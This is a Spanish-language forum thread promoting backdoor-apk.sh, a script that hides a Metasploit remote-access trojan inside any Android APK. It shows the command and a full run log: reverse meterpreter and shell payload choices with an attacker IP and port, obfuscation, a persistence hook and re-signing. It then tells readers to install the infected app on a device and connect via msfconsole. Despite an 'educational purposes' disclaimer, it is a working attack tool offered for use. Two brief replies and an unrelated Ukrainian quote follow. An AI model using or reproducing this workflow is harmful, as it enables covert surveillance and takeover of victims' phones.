Backdoor-APK - Script para agregar backdoors a las APKs

Iniciado por ANTRAX, Diciembre 24, 2016, 12:16:48 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.


Bakcdoor-APK es un script que simplifica el proceso de agregar un backdoor a cualquier APK para Android. Para utilizar este script, es necesario que los usuarios tengan conocimientos de Linux, Bash, Metasploit, Apktool, el SDK de android, smali, etc.
La idea de este script es mantenerlo lejos del alcance de gente mal intencionada. Es solo para propositos educativos.

Uso:
Código: bash
./backdoor-apk.sh BaiduBrowser.apk


Código: bash
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.1.7 on Wed Nov 30 22:30:34 EST 2016
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.


El APK recompilado funcionará en el directorio original de la APK que infectamos. Ahora solo es necesario instalar el APK en alguna terminal de Android y correrla.

Ahora podremos conectarnos por meterpreter con el script generado:

msfconsole -r backdoor-apk.rc

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero que les sea de utilidad.
ANTRAX


Wow, se ve muy interesante! Hacerlo todo a mano lleva un tiempo muy valioso y después de tres o cuatro veces se hace un tanto tedioso, le echaré un vistazo, gracias!! :)

Pregunta!!, el backdoor  apk ,descompila el apk oh lo hace con apktool y el source del apk lo une y genera el backdoor ahora esto lo hace con, cualquier apk es decir firmas y certificadas,?


Ми повинні мати віру в себе. У цьому і полягає секрет. Навіть коли я був у дитячому будинку і ходили по вулицях у пошуках їжі, щоб жити, навіть тоді, я вважав найбільшим актором в світі. Без абсолютної впевненості, один приречена на провал.